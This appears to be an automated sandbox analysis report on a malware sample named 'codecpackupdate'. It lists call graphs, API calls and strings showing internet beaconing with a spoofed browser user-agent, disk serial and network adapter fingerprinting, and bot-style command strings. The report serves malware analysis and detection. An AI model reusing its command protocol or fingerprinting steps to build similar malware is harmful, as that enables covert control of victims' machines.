20653->20656 20657 a04e35 __gmtime64_s 9 API calls 20654->20657 20660 a05d9b _malloc 59 API calls 20655->20660 20663 a0b141 20656->20663 20657->20659 20659->20628 20661 a0b0ed 20660->20661 20678 a0b119 20661->20678 20664 a10e84 __lseeki64_nolock 59 API calls 20663->20664 20667 a0b14f 20664->20667 20665 a0b1a5 20681 a10dfe 20665->20681 20667->20665 20668 a0b183 20667->20668 20670 a10e84 __lseeki64_nolock 59 API calls 20667->20670 20668->20665 20671 a10e84 __lseeki64_nolock 59 API calls 20668->20671 20673 a0b17a 20670->20673 20674 a0b18f CloseHandle 20671->20674 20672 a0b1cf 20672->20661 20676 a10e84 __lseeki64_nolock 59 API calls 20673->20676 20674->20665 20677 a0b19b GetLastError 20674->20677 20675 a05d7a __dosmaperr 59 API calls 20675->20672 20676->20668 20677->20665 20690 a10f6d RtlLeaveCriticalSection 20678->20690 20680 a0b11f 20680->20659 20682 a10e6a 20681->20682 20683 a10e0a 20681->20683 20684 a05d9b _malloc 59 API calls 20682->20684 20683->20682 20688 a10e33 20683->20688 20685 a10e6f 20684->20685 20686 a05d67 __lseeki64 59 API calls 20685->20686 20687 a0b1ad 20686->20687 20687->20672 20687->20675 20688->20687 20689 a10e55 SetStdHandle 20688->20689 20689->20687 20690->20680 20691 4026ba 20692 40b0d5 RegSetValueExA 20691->20692 20694 40bba1 RegCloseKey 20692->20694 20695 40bba7 20694->20695 20696 40223c GetCommandLineW 20697 40b040 CommandLineToArgvW 20696->20697 20698 40b942 GetLocalTime 20697->20698 20701 401f27 20698->20701 20702 401f3c 20701->20702 20705 401a1d 20702->20705 20704 401f45 20706 401a2c 20705->20706 20711 401a4f CreateFileA 20706->20711 20710 401a3e 20710->20704 20712 401a35 20711->20712 20713 401a7d 20711->20713 20719 401b4b LoadLibraryA 20712->20719 20714 401a98 DeviceIoControl 20713->20714 20716 401b3a FindCloseChangeNotification 20713->20716 20717 401b0e GetLastError 20713->20717 20728 402cb6 20713->20728 20731 402ca8 20713->20731 20714->20713 20716->20712 20717->20713 20717->20716 20720 401c21 20719->20720 20721 401b6e GetProcAddress 20719->20721 20720->20710 20722 401c18 FreeLibrary 20721->20722 20726 401b85 20721->20726 20722->20720 20723 401b95 GetAdaptersInfo 20723->20726 20724 402cb6 7 API calls 20724->20726 20725 401c15 20725->20722 20726->20723 20726->20724 20726->20725 20727 402ca8 12 API calls 20726->20727 20727->20726 20729 403061 7 API calls 20728->20729 20730 402cbf 20729->20730 20730->20713 20732 402e82 12 API calls 20731->20732 20733 402cb3 20732->20733 20733->20713

                                                                          Executed Functions

                                                                          Function 009F72A7 Relevance: 74.2, APIs: 29, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 9f72a7-9f72bf InternetOpenA 1 9f7385-9f738b 0->1 2 9f72c5-9f7319 InternetSetOptionA * 3 call a04a30 0->2 3 9f738d-9f7393 1->3 4 9f73a7-9f73b5 1->4 10 9f731e-9f733c InternetOpenUrlA 2->10 6 9f7399-9f73a6 call 9f53ec 3->6 7 9f7395-9f7397 3->7 8 9f73bb-9f73df call a04a30 call 9f439c 4->8 9 9f66f0-9f66f2 4->9 6->4 7->4 8->9 33 9f73e5-9f7413 RtlEnterCriticalSection RtlLeaveCriticalSection call a0227c 8->33 13 9f66fb-9f66fd 9->13 14 9f66f4-9f66f9 9->14 15 9f737e-9f737f InternetCloseHandle 10->15 16 9f733e 10->16 18 9f66ff 13->18 19 9f670a-9f673e RtlEnterCriticalSection RtlLeaveCriticalSection 13->19 21 9f6704 Sleep 14->21 15->1 22 9f7342-9f7368 InternetReadFile 16->22 18->21 26 9f678e 19->26 27 9f6740-9f674c 19->27 21->19 24 9f736a-9f7371 22->24 25 9f7373-9f737a InternetCloseHandle 22->25 24->22 25->15 29 9f6792 26->29 27->26 28 9f674e-9f675b 27->28 31 9f675d-9f6761 28->31 32 9f6763-9f6764 28->32 29->0 34 9f6768-9f678c call a04a30 * 2 31->34 32->34 38 9f7469-9f7484 call a0227c 33->38 39 9f7415-9f7427 call a0227c 33->39 34->29 48 9f773e-9f7750 call a0227c 38->48 49 9f748a-9f748c 38->49 39->38 47 9f7429-9f743b call a0227c 39->47 47->38 59 9f743d-9f744f call a0227c 47->59 56 9f7799-9f77a2 call a0227c 48->56 57 9f7752-9f7754 48->57 49->48 51 9f7492-9f7544 call a02eec RtlEnterCriticalSection RtlLeaveCriticalSection call a04a30 * 5 call 9f439c * 2 49->51 112 9f7546-9f7548 51->112 113 9f7581 51->113 66 9f77a7-9f77ab 56->66 57->56 60 9f7756-9f7794 call a04a30 RtlEnterCriticalSection RtlLeaveCriticalSection 57->60 59->38 72 9f7451-9f7463 call a0227c 59->72 60->9 70 9f77ad-9f77bb call 9f61f1 call 9f62ff 66->70 71 9f77cc-9f77de call a0227c 66->71 87 9f77c0-9f77c7 call 9f640a 70->87 81 9f7afc-9f7b0e call a0227c 71->81 82 9f77e4-9f77e6 71->82 72->9 72->38 81->9 93 9f7b14-9f7b42 call a02eec call a04a30 call 9f439c 81->93 82->81 85 9f77ec-9f7803 call 9f439c 82->85 85->9 98 9f7809-9f78d7 call a02358 call 9f1ba7 85->98 87->9 118 9f7b4b-9f7b52 call a02eb4 93->118 119 9f7b44-9f7b46 call 9f534d 93->119 115 9f78de-9f78ff RtlEnterCriticalSection 98->115 116 9f78d9 call 9f143f 98->116 112->113 117 9f754a-9f755c call a0227c 112->117 120 9f7585-9f75b3 call a02eec call a04a30 call 9f439c 113->120 122 9f790b-9f7941 RtlLeaveCriticalSection call 9f3c67 call 9f3d7e 115->122 123 9f7901-9f7908 115->123 116->115 117->113 134 9f755e-9f757f call 9f439c 117->134 118->9 119->118 144 9f75b5-9f75c4 call a03529 120->144 145 9f75f4-9f75fd call a02eb4 120->145 136 9f7946-9f7963 call 9f826e 122->136 123->122 134->120 142 9f7968-9f796f 136->142 146 9f7975-9f79af call 9fa658 142->146 147 9f7ae3-9f7af7 call 9f8f36 142->147 144->145 156 9f75c6 144->156 159 9f7734-9f7737 145->159 160 9f7603-9f761b call a03a8f 145->160 153 9f79b4-9f79bd 146->153 147->9 157 9f7aad-9f7ade call 9f831d call 9f33b2 153->157 158 9f79c3-9f79ca 153->158 161 9f75cb-9f75dd call a02790 156->161 157->147 163 9f79cd-9f79d2 158->163 159->48 169 9f761d-9f7625 call 9f966a 160->169 170 9f7627 160->170 176 9f75df 161->176 177 9f75e2-9f75f2 call a03529 161->177 163->163 168 9f79d4-9f7a11 call 9fa658 163->168 178 9f7a16-9f7a1f 168->178 175 9f7629-9f765d call 9fa782 call 9f3863 169->175 170->175 189 9f7662-9f767e call 9f5119 175->189 176->177 177->145 177->161 178->157 182 9f7a25-9f7a2b 178->182 183 9f7a2e-9f7a33 182->183 183->183 186 9f7a35-9f7a70 call 9fa658 183->186 186->157 192 9f7a72-9f7aa6 call 9fd04a 186->192 193 9f7683-9f76b4 call 9f3863 call 9faa28 189->193 196 9f7aab-9f7aac 192->196 199 9f76b9-9f76cb call 9fab42 193->199 196->157 201 9f76d0-9f76e1 199->201 202 9f76e8-9f76f7 Sleep 201->202 203 9f76e3 call 9f380b 201->203 205 9f76ff-9f7713 call a01830 202->205 203->202 207 9f771f-9f772d 205->207 208 9f7715-9f771e call 9f4100 205->208 207->159 210 9f772f call 9f380b 207->210 208->207 210->159
                                                                          APIs
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          • InternetOpenA.WININET(?), ref: 009F72B1
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 009F72D9
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 009F72F1
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 009F7309
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 009F7332
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009F7354
                                                                          • InternetCloseHandle.WININET(00000000), ref: 009F7374
                                                                          • InternetCloseHandle.WININET(00000000), ref: 009F737F
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F73EA
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F73FB
                                                                          • _malloc.LIBCMT ref: 009F7494
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F74A6
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F74B2
                                                                          • _malloc.LIBCMT ref: 009F758A
                                                                          • _strtok.LIBCMT ref: 009F75BB
                                                                          • _swscanf.LIBCMT ref: 009F75D2
                                                                          • _strtok.LIBCMT ref: 009F75E9
                                                                          • _free.LIBCMT ref: 009F75F5
                                                                          • Sleep.KERNEL32(000007D0), ref: 009F76ED
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F776E
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F7780
                                                                          • _sprintf.LIBCMT ref: 009F781E
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 009F78E2
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 009F7916
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                          • API String ID: 1657546717-1839899575
                                                                          • Opcode ID: aa432bd4dc7a2c82af757c600a40636c866138876f6bbef5301badfbbfb23227
                                                                          • Instruction ID: eabc57592ba566f2e1739f9c6de0cdc913abe37619aacc9c1e37ffcb0d5e7cc7
                                                                          • Opcode Fuzzy Hash: aa432bd4dc7a2c82af757c600a40636c866138876f6bbef5301badfbbfb23227
                                                                          • Instruction Fuzzy Hash: EC32F07150C385AFD720AB64DC45BEFB7E9AF89310F10482DF689972A1EB709944CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F6487 Relevance: 68.5, APIs: 34, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 213 9f6487-9f66ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 9f42c7 GetTickCount call 9f605a GetVersionExA call a04a30 call a02eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call a04a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call a02eec * 4 QueryPerformanceCounter Sleep call a02eec * 2 call a04a30 * 2 258 9f66f0-9f66f2 213->258 259 9f66fb-9f66fd 258->259 260 9f66f4-9f66f9 258->260 261 9f66ff 259->261 262 9f670a-9f673e RtlEnterCriticalSection RtlLeaveCriticalSection 259->262 263 9f6704 Sleep 260->263 261->263 264 9f678e 262->264 265 9f6740-9f674c 262->265 263->262 267 9f6792-9f72bf InternetOpenA 264->267 265->264 266 9f674e-9f675b 265->266 268 9f675d-9f6761 266->268 269 9f6763-9f6764 266->269 272 9f7385-9f738b 267->272 273 9f72c5-9f733c InternetSetOptionA * 3 call a04a30 InternetOpenUrlA 267->273 271 9f6768-9f678c call a04a30 * 2 268->271 269->271 271->267 274 9f738d-9f7393 272->274 275 9f73a7-9f73b5 272->275 286 9f737e-9f737f InternetCloseHandle 273->286 287 9f733e 273->287 278 9f7399-9f73a6 call 9f53ec 274->278 279 9f7395-9f7397 274->279 275->258 281 9f73bb-9f73df call a04a30 call 9f439c 275->281 278->275 279->275 281->258 296 9f73e5-9f7413 RtlEnterCriticalSection RtlLeaveCriticalSection call a0227c 281->296 286->272 291 9f7342-9f7368 InternetReadFile 287->291 293 9f736a-9f7371 291->293 294 9f7373-9f737a InternetCloseHandle 291->294 293->291 294->286 299 9f7469-9f7484 call a0227c 296->299 300 9f7415-9f7427 call a0227c 296->300 306 9f773e-9f7750 call a0227c 299->306 307 9f748a-9f748c 299->307 300->299 305 9f7429-9f743b call a0227c 300->305 305->299 317 9f743d-9f744f call a0227c 305->317 314 9f7799-9f77ab call a0227c 306->314 315 9f7752-9f7754 306->315 307->306 309 9f7492-9f7544 call a02eec RtlEnterCriticalSection RtlLeaveCriticalSection call a04a30 * 5 call 9f439c * 2 307->309 370 9f7546-9f7548 309->370 371 9f7581 309->371 328 9f77ad-9f77bb call 9f61f1 call 9f62ff 314->328 329 9f77cc-9f77de call a0227c 314->329 315->314 318 9f7756-9f7794 call a04a30 RtlEnterCriticalSection RtlLeaveCriticalSection 315->318 317->299 330 9f7451-9f7463 call a0227c 317->330 318->258 345 9f77c0-9f77c7 call 9f640a 328->345 339 9f7afc-9f7b0e call a0227c 329->339 340 9f77e4-9f77e6 329->340 330->258 330->299 339->258 351 9f7b14-9f7b42 call a02eec call a04a30 call 9f439c 339->351 340->339 343 9f77ec-9f7803 call 9f439c 340->343 343->258 356 9f7809-9f78d7 call a02358 call 9f1ba7 343->356 345->258 376 9f7b4b-9f7b52 call a02eb4 351->376 377 9f7b44-9f7b46 call 9f534d 351->377 373 9f78de-9f78ff RtlEnterCriticalSection 356->373 374 9f78d9 call 9f143f 356->374 370->371 375 9f754a-9f755c call a0227c 370->375 378 9f7585-9f75b3 call a02eec call a04a30 call 9f439c 371->378 380 9f790b-9f796f RtlLeaveCriticalSection call 9f3c67 call 9f3d7e call 9f826e 373->380 381 9f7901-9f7908 373->381 374->373 375->371 392 9f755e-9f757f call 9f439c 375->392 376->258 377->376 402 9f75b5-9f75c4 call a03529 378->402 403 9f75f4-9f75fd call a02eb4 378->403 404 9f7975-9f79bd call 9fa658 380->404 405 9f7ae3-9f7af7 call 9f8f36 380->405 381->380 392->378 402->403 414 9f75c6 402->414 417 9f7734-9f7737 403->417 418 9f7603-9f761b call a03a8f 403->418 415 9f7aad-9f7ade call 9f831d call 9f33b2 404->415 416 9f79c3-9f79ca 404->416 405->258 419 9f75cb-9f75dd call a02790 414->419 415->405 421 9f79cd-9f79d2 416->421 417->306 427 9f761d-9f7625 call 9f966a 418->427 428 9f7627 418->428 434 9f75df 419->434 435 9f75e2-9f75f2 call a03529 419->435 421->421 426 9f79d4-9f7a1f call 9fa658 421->426 426->415 440 9f7a25-9f7a2b 426->440 433 9f7629-9f76cb call 9fa782 call 9f3863 call 9f5119 call 9f3863 call 9faa28 call 9fab42 427->433 428->433 459 9f76d0-9f76e1 433->459 434->435 435->403 435->419 441 9f7a2e-9f7a33 440->441 441->441 444 9f7a35-9f7a70 call 9fa658 441->444 444->415 450 9f7a72-9f7aa6 call 9fd04a 444->450 454 9f7aab-9f7aac 450->454 454->415 460 9f76e8-9f7713 Sleep call a01830 459->460 461 9f76e3 call 9f380b 459->461 465 9f771f-9f772d 460->465 466 9f7715-9f771e call 9f4100 460->466 461->460 465->417 468 9f772f call 9f380b 465->468 466->465 468->417
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(00A271B8), ref: 009F64B6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009F64CD
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64D6
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009F64E5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F64E8
                                                                          • GetTickCount.KERNEL32 ref: 009F64F4
                                                                            • Part of subcall function 009F605A: _malloc.LIBCMT ref: 009F6068
                                                                          • GetVersionExA.KERNEL32(00A27010), ref: 009F6521
                                                                          • _malloc.LIBCMT ref: 009F654D
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • _malloc.LIBCMT ref: 009F655D
                                                                          • _malloc.LIBCMT ref: 009F6568
                                                                          • _malloc.LIBCMT ref: 009F6573
                                                                          • _malloc.LIBCMT ref: 009F657E
                                                                          • _malloc.LIBCMT ref: 009F6589
                                                                          • _malloc.LIBCMT ref: 009F6594
                                                                          • _malloc.LIBCMT ref: 009F65A3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009F65BA
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65C3
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65D2
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65D5
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009F65E0
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F65E3
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F661D
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F662A
                                                                          • _malloc.LIBCMT ref: 009F664E
                                                                          • _malloc.LIBCMT ref: 009F665C
                                                                          • _malloc.LIBCMT ref: 009F6663
                                                                          • _malloc.LIBCMT ref: 009F6689
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 009F669C
                                                                          • Sleep.KERNELBASE ref: 009F66AA
                                                                          • _malloc.LIBCMT ref: 009F66B6
                                                                          • _malloc.LIBCMT ref: 009F66C3
                                                                          • Sleep.KERNELBASE(0000EA60), ref: 009F6704
                                                                          • RtlEnterCriticalSection.NTDLL(00A271B8), ref: 009F670F
                                                                          • RtlLeaveCriticalSection.NTDLL(00A271B8), ref: 009F6720
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                          • API String ID: 4273019447-2678694477
                                                                          • Opcode ID: ddca006462ebe0f128f29a403cd4e0eac2e1a7cd97cc4520bf1db61343356e25
                                                                          • Instruction ID: cd4c20e3151918897be6887de5d181d4586298108d8a841adfa167c46d398f2b
                                                                          • Opcode Fuzzy Hash: ddca006462ebe0f128f29a403cd4e0eac2e1a7cd97cc4520bf1db61343356e25
                                                                          • Instruction Fuzzy Hash: 4171C4B1948354AFE710EF74EC0AB6F7BE8BF49710F10482AF68497291DBB45901CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 840 401b4b-401b68 LoadLibraryA 841 401c21-401c25 840->841 842 401b6e-401b7f GetProcAddress 840->842 843 401b85-401b8e 842->843 844 401c18-401c1b FreeLibrary 842->844 845 401b95-401ba5 GetAdaptersInfo 843->845 844->841 846 401ba7-401bb0 845->846 847 401bdb-401be3 845->847 850 401bc1-401bd7 call 402cd0 call 4018cc 846->850 851 401bb2-401bb6 846->851 848 401be5-401beb call 402cb6 847->848 849 401bec-401bf0 847->849 848->849 853 401bf2-401bf6 849->853 854 401c15-401c17 849->854 850->847 851->847 855 401bb8-401bbf 851->855 853->854 858 401bf8-401bfb 853->858 854->844 855->850 855->851 860 401c06-401c13 call 402ca8 858->860 861 401bfd-401c03 858->861 860->845 860->854 861->860
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FF8DA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 914 9ff8da-9ff8fd LoadLibraryA 915 9ff9bd-9ff9c4 914->915 916 9ff903-9ff911 GetProcAddress 914->916 917 9ff917-9ff927 916->917 918 9ff9b6-9ff9b7 FreeLibrary 916->918 919 9ff929-9ff935 GetAdaptersInfo 917->919 918->915 920 9ff96d-9ff975 919->920 921 9ff937 919->921 923 9ff97e-9ff983 920->923 924 9ff977-9ff97d call a036eb 920->924 922 9ff939-9ff940 921->922 925 9ff94a-9ff952 922->925 926 9ff942-9ff946 922->926 928 9ff985-9ff988 923->928 929 9ff9b1-9ff9b5 923->929 924->923 931 9ff955-9ff95a 925->931 926->922 930 9ff948 926->930 928->929 933 9ff98a-9ff98f 928->933 929->918 930->920 931->931 934 9ff95c-9ff969 call 9ff629 931->934 935 9ff99c-9ff9a7 call a03a8f 933->935 936 9ff991-9ff999 933->936 934->920 935->929 941 9ff9a9-9ff9ac 935->941 936->935 941->919
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 009FF8F0
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 009FF909
                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 009FF92E
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 009FF9B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 20ab673fc821e9e4abc281dfbeae330ba7c6fb7646fd2a670dda12bbdfea00f3
                                                                          • Instruction ID: 11384d2eb0220f48c1701c7a3c9429a1f299627554a578c1d0dc0dee28f6db0a
                                                                          • Opcode Fuzzy Hash: 20ab673fc821e9e4abc281dfbeae330ba7c6fb7646fd2a670dda12bbdfea00f3
                                                                          • Instruction Fuzzy Hash: EE219475A0420DABDB14DFA8D8A47FEBBBCAF05350F1440BAE644E7241D7749E85C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FF7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 999 9ff7d6-9ff801 CreateFileA 1000 9ff807-9ff81c 999->1000 1001 9ff8d2-9ff8d9 999->1001 1002 9ff81f-9ff841 DeviceIoControl 1000->1002 1003 9ff87a-9ff882 1002->1003 1004 9ff843-9ff84b 1002->1004 1007 9ff88b-9ff88d 1003->1007 1008 9ff884-9ff88a call a036eb 1003->1008 1005 9ff84d-9ff852 1004->1005 1006 9ff854-9ff859 1004->1006 1005->1003 1006->1003 1009 9ff85b-9ff863 1006->1009 1011 9ff88f-9ff892 1007->1011 1012 9ff8c8-9ff8d1 FindCloseChangeNotification 1007->1012 1008->1007 1013 9ff866-9ff86b 1009->1013 1015 9ff8ae-9ff8bb call a03a8f 1011->1015 1016 9ff894-9ff89d GetLastError 1011->1016 1012->1001 1013->1013 1018 9ff86d-9ff879 call 9ff629 1013->1018 1015->1012 1023 9ff8bd-9ff8c3 1015->1023 1016->1012 1019 9ff89f-9ff8a2 1016->1019 1018->1003 1019->1015 1020 9ff8a4-9ff8ab 1019->1020 1020->1015 1023->1002
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 009FF7F5
                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 009FF833
                                                                          • GetLastError.KERNEL32 ref: 009FF894
                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 009FF8CB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 3786717961-1180397377
                                                                          • Opcode ID: 05f4b2a3e477b3765b9e3bb5654f9c73c1eef353627396a6b5fad5f49a997fc7
                                                                          • Instruction ID: 0cb86fdf902d3299a3073ef839a941e89d88d4e974ca0a20c42069af3d310c0b
                                                                          • Opcode Fuzzy Hash: 05f4b2a3e477b3765b9e3bb5654f9c73c1eef353627396a6b5fad5f49a997fc7
                                                                          • Instruction Fuzzy Hash: 56319E72D00219ABDB14DF95D8A4AFEBBB8FF09790F20417AE606A7290D7705E05CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1025 401a4f-401a77 CreateFileA 1026 401b45-401b4a 1025->1026 1027 401a7d-401a91 1025->1027 1028 401a98-401ac0 DeviceIoControl 1027->1028 1029 401ac2-401aca 1028->1029 1030 401af3-401afb 1028->1030 1031 401ad4-401ad9 1029->1031 1032 401acc-401ad2 1029->1032 1033 401b04-401b07 1030->1033 1034 401afd-401b03 call 402cb6 1030->1034 1031->1030 1038 401adb-401af1 call 402cd0 call 4018cc 1031->1038 1032->1030 1036 401b09-401b0c 1033->1036 1037 401b3a-401b44 FindCloseChangeNotification 1033->1037 1034->1033 1040 401b27-401b34 call 402ca8 1036->1040 1041 401b0e-401b17 GetLastError 1036->1041 1037->1026 1038->1030 1040->1028 1040->1037 1041->1037 1043 401b19-401b1c 1041->1043 1043->1040 1046 401b1e-401b24 1043->1046 1046->1040
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 3786717961-1180397377
                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
